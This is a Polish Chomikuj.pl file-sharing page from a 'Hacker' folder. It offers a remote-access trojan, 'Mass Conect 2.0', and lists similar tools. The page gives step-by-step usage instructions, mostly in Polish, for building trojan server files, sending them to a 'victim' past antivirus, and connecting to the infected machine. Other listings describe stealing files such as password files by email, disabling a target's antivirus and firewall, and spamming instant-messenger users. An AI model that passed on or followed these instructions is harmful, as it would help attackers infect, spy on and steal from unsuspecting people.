Wykorzystujemy pliki cookies i podobne technologie w celu usprawnienia korzystania z serwisu Chomikuj.pl oraz wyświetlenia reklam dopasowanych do Twoich potrzeb.

Jeśli nie zmienisz ustawień dotyczących cookies w Twojej przeglądarce, wyrażasz zgodę na ich umieszczanie na Twoim komputerze przez administratora serwisu Chomikuj.pl – Kelo Corporation.

W każdej chwili możesz zmienić swoje ustawienia dotyczące cookies w swojej przeglądarce internetowej. Dowiedz się więcej w naszej Polityce Prywatności - http://chomikuj.pl/PolitykaPrywatnosci.aspx.

Jednocześnie informujemy że zmiana ustawień przeglądarki może spowodować ograniczenie korzystania ze strony Chomikuj.pl.

W przypadku braku twojej zgody na akceptację cookies niestety prosimy o opuszczenie serwisu chomikuj.pl.

Wykorzystanie plików cookies przez Zaufanych Partnerów (dostosowanie reklam do Twoich potrzeb, analiza skuteczności działań marketingowych).

Wyrażam sprzeciw na cookies Zaufanych Partnerów
NIE TAK

Wyrażenie sprzeciwu spowoduje, że wyświetlana Ci reklama nie będzie dopasowana do Twoich preferencji, a będzie to reklama wyświetlona przypadkowo.

Istnieje możliwość zmiany ustawień przeglądarki internetowej w sposób uniemożliwiający przechowywanie plików cookies na urządzeniu końcowym. Można również usunąć pliki cookies, dokonując odpowiednich zmian w ustawieniach przeglądarki internetowej.

Pełną informację na ten temat znajdziesz pod adresem http://chomikuj.pl/PolitykaPrywatnosci.aspx.

Nie masz jeszcze własnego chomika? Załóż konto

Mass Conect 2.0 beta.zip

jarusrogus / Programy / Hacker / Mass Conect 2.0 beta.zip
Download: Mass Conect 2.0 beta.zip

1,73 MB

0.0 / 5 (0 głosów)
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie "Mass Conect 2.0 beta.zip"
2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki:
"mc2.exe"
3. Odpalamy plik o nazwie "mc2.exe". Uruchamia się program widziany na screenie:
obrazek4. Najpierw klikamy na zakładkę "Ustawienia Klienta". Uruchomi się okienko widziane poniżej. Musimy je uzupełnić odpowiednimi danymi i kliknąć na opcję "Zapisz"
obrazek5. Następnie musisz kliknąć na zakładkę "Ustawienia serwera". Uruchamia się program widziany na screenie, który należy uzupełnić odpowiednimi danymi i kliknąć na opcję "Zapisz". Dzięki temu powstanie plik serwer.
obrazek6. Plik serwer który przed chwilą utworzyłeś należy wysłać do swojej ofiary. Ofiara musi go otworzyć a jej antywir nic nie zczaić.
7. Na koniec otwierasz plik "mc2.exe" i wysyłasz odpowiednią komendę na serwer trojana.
PS: Więcej informacji o obsłudze trojana znajdziesz w pliku "Info.txt" w paczce.

Komentarze:

Nie ma jeszcze żadnego komentarza. Dodaj go jako pierwszy!

Aby dodawać komentarze musisz się zalogować

Inne pliki do pobrania z tego chomika
Obsługa programu: 1. Ściągamy plik Plik jest skompresowany, więc musimy go zdekompresować. Wchodzimy do zdekompresowanego folderu i widzimy dwa pliki: -client.exe -server.exe 2. Plik server.exe wysyłamy do naszej ofiary. 3. Otwieramy plik client.exe. Uruchomi się program widziany na screenie. Za jego pomocą połączymy się z zainfekowanym komputerem. obrazek
Obsługa programu: 1. Ściągamy skompresowany plik o nazwie "Big Ben 3.0.zip" 2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki: Big Ben v.3.0 Klient.exe, Big Ben v.3.0 Server.exe, Big Ben v.3.0 Kill Server.exe 3. Plik o nazwie Big Ben v.3.0 Server.exe podrzucamy naszej ofiarze. 4. My zaś otwieramy plik Big Ben v.3.0 Klient.exe. Uruchomi się program widziany na screenie, w którym klikamy na zakładkę "Połączenie" i podajemy adres IP naszej ofiary i klikamy na "Połącz" obrazek ------------------------------------------------------------------------------------------------------------ obrazek
Obsługa programu: 1. Ściągamy skompresowany plik o nazwie Katiusz 2.zip 2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy plik: katiusz2.1.exe 3. Plik o nazwie katiusz2.1.exe odpalamy u siebie. Uruchamia się program widziany na screenie: obrazek4. Teraz musisz stworzyć trojana (plik serwer), który podrzucisz do swojej ofiary. Aby to zrobić klikasz na zakładkę "Konfiguracja". Teraz uzupełnisz wszystkie ramki i klikasz na Generuj. Powstaje trojan :) 5. Teraz wysyłasz go do ofiary. Ofiara musi go otworzyć.
Obsługa programu: 1. Parszywiec działa na porcie 3023, i jak narazie nie dodaje się do rejestru. Posiada następujące funkcje: przeszukiwanie dysków, wysyłanie pliku na FTP 2. Ściągamy skompresowany plik o nazwie Parszywiec 1.1.zip 3. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki: parszywiec_k.exe, parszywiec_s.exe 4. Plik o nazwie Parszywiec_s.exe (czyli plik serwer) musimy podrzucić naszej ofiarze. 5. My zaś otwieramy plik o nazwie parszywiec_k.exe (czyli plik client). Uruchamia się program widziany na screenie w którym podajemy adres IP i klikamy na połącz. obrazek
Obsługa programu: 1. Ściągamy skompresowany plik o nazwie Oko szefa.zip 2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki: os-klient.exe 2.6.exe, os-serwer 2.6.exe 3. W przeciwieństwie do trojanów to plik serwer musisz zainstalować u siebie na komputerze a klienta na komputerze pracowników. 4. Obsługa jest bardzo prosta wyszukujesz zakres ip w sieci z zainstalowanym programem i po lewej stronie programu będą się pojawiać dostępne ikonki komputerów. obrazek
Obsługa programu: 1. Ściągamy skompresowany plik o nazwie WinCrash.zip 2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki: Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki: WinCrash-E.exe, server.exe 3. Plik o nazwie serwer.exe musimy podrzucić do naszej ofiary. 4. My zaś otwieramy plik o nazwie WinCrash-E.exe, czyli plik client. Uruchamia się program widziany na screenie w którym musimy podać adres IP naszej ofiary i kliknąć na connect. obrazek
Obsługa programu: 1. Program złodziej służy do wykradania plików (małych) 2. Ściągamy skompresowany plik o nazwie Złodziej.zip 3. Dekompresujemy ten plik i wchodzimy do folderu. 4. Odpalamy plik o nazwie konfigurator.exe Uruchamia się program widziany na screenie: obrazek5. W konfiguratorze podajemy e-mail na który ma zostać wysłany plik i lokacje pliku np: gdy chcemy ściągnąć od kogoś plik to podajemy swój e-mail i dowiadujemy się gdzie znajduje się plik który chcemy ściągnąć.Jeżeli ktoś np: posiada plik haslo.txt to musimy się dowiedzieć gdzie go trzyma np: C:\haslo.txt wpisujemy to w lokacje! WPISYWAĆ DOKŁADNIE! Klikamy Generuj. Powstaje Plik.exe (czyli trojan), możemy zmienić nazwę, ikonę i wysyłać ofiarze. 6. PLIK JEST NIEGROŹNY!!! po odpaleniu trojana wyskakuje fałszywy błąd: ERROR 615632187x Nie znaleziono taskmgr.dll który ma wprowadzić w błąd. Program wysyła podany plik z lokacji na e-mail i się wyłącza...
Obsługa programu: 1. Na początku powiem że ten trojan służy tylko i wyłącznie do zabicia lamerowi przydatnych mu programów np. antywirusa i ogniomurka (czytaj firewalla), które odpowiadają za podstawowe bezpieczeństwo systemu. Ponadto możemy zablokować dostęp do rejestru, cmd, czy też nieznane programy. 2. Ściągamy plik Blackkillerv1.zip Plik jest skompresowany, więc musimy go zdekompresować. Wchodzimy do zdekompresowanego folderu i widzimy plik o nazwie BlackKiLLer.exe. Odpalamy go. Uruchamia się program widziany na screenshocie: obrazek3. Zaznaczamy interesujące nas opcje i klikamy na opcję Make BlackKiLLeR Plik serwer (czyli trojan) zostaje stworzony. Następnie wysyłamy go do naszej ofiary.
GG Spambot 1.0 Program służy do masowago wysyłania wiadomości na komunikatory oparte na gg potrafi spamować czyjeś numery ze 100 własnych numerów czyli zakładamy sobie na gg 100 numerów wpisujemy je w najwieksze pole o nazwie "Nr. Wlasne" klikamy "wyślij Spam" po czym do atakowanej osoby zostaje wysłana wiadomość ze 100 numerów także możemy dzieki nim spamować wybierając zakres jednak postanowiłem ograniczyć spamowanie i ustawiłem zakres jedynie 100 numerów dodatkowo program posiada opcje "Auto odpisywanie" funkcja ta przydaje się gdy nie ma nas przy komputerze wpisujemy jakiś tekst np. będe później w pole "Auto odpisywanie" i gdy jakaś osoba napisze do jednego z naszych numerów zostanie odpisana ta wiadomość Opis każdego pola Twoje Numery - wpisujemy tutaj twoje numery gg z których będzie wysyłany spam do innych numerów Hasło do numerów - hasło do numerów służących do spamu Treść wiadomośći - tu wpisujesz wiadmość która będzie wysyłana Wiadomości przychodzące - pole to służy do odbierania wiadomości jeśli spamujesz z wielu numerów i ktoś odpisze do któregoś z numerów to zostanie to tam zapisane twój opis - opis jaki ma się wyświetlać po zalogowaniu numerów Nr. Własne - tutaj mozesz dodać 100 własnych numerów z których będą wysyłane wiadomośći Nr. do spamu - do pola tego dodają się numery które mają być spamowane ilosć numerów ograniczona do 100 Numery spamowane - tutaj wpisujesz numery które po wpisaniu dodają się na liste o nazwie "Nr. do spamu" "Od Do" - pola liczbowe ustawia się w nich zakres spamowanych numerów Spowolnij - pole liczbowe ustawia się tempo z jaką prędkością ma wysyłać wiadomości Auto odpisywanie - program automatycznie będzie odpisywał wiadomość do numerów próbujących wysłać do nas wiadomość Przyciski : Dodaj Numer - po wpisaniu numeru w pole "Twoje Numery" i kliknięciu tego przycisku numer dodaje się do pola "Nr.Wlasne" w pole to wpisujemy własne numery gg z których będzie wysyłany spam Usuń Numery - kasuje wszystkie numery znajdujące się w polu "Nr. Własne" Dodaj z pliku - pozwala na dodanie numerów z pliku tekstowego Połacz - Włącza twoje numery Wyloguj - wyłącza twoje numery Status - ustawia status jaki ma się pojawić po zalogowaniu numerów Wyślij Spam - jest to główny przycisk nim wysyłasz wszystkie wiadomości Rozciągnij przychodzące - przycisk powieksza pole służące za odbiór wiadomości Opcje - pozwala zapamiętać, odczytać wszystkie i wyczyścić wszystkie rzeczy wpisane w programie Informacje - znajduje się tu instrukcja oraz link do strony autora na której mozesz dowiedzieć się wiecej na temat programu Program służy jedynie do celów edukacyjnych używasz go na własną odpowiedzialność
więcej plików z tego folderu...
Zgłoś jeśli naruszono regulamin
W ramach Chomikuj.pl stosujemy pliki cookies by umożliwić Ci wygodne korzystanie z serwisu. Jeśli nie zmienisz ustawień dotyczących cookies w Twojej przeglądarce, będą one umieszczane na Twoim komputerze. W każdej chwili możesz zmienić swoje ustawienia. Dowiedz się więcej w naszej Polityce Prywatności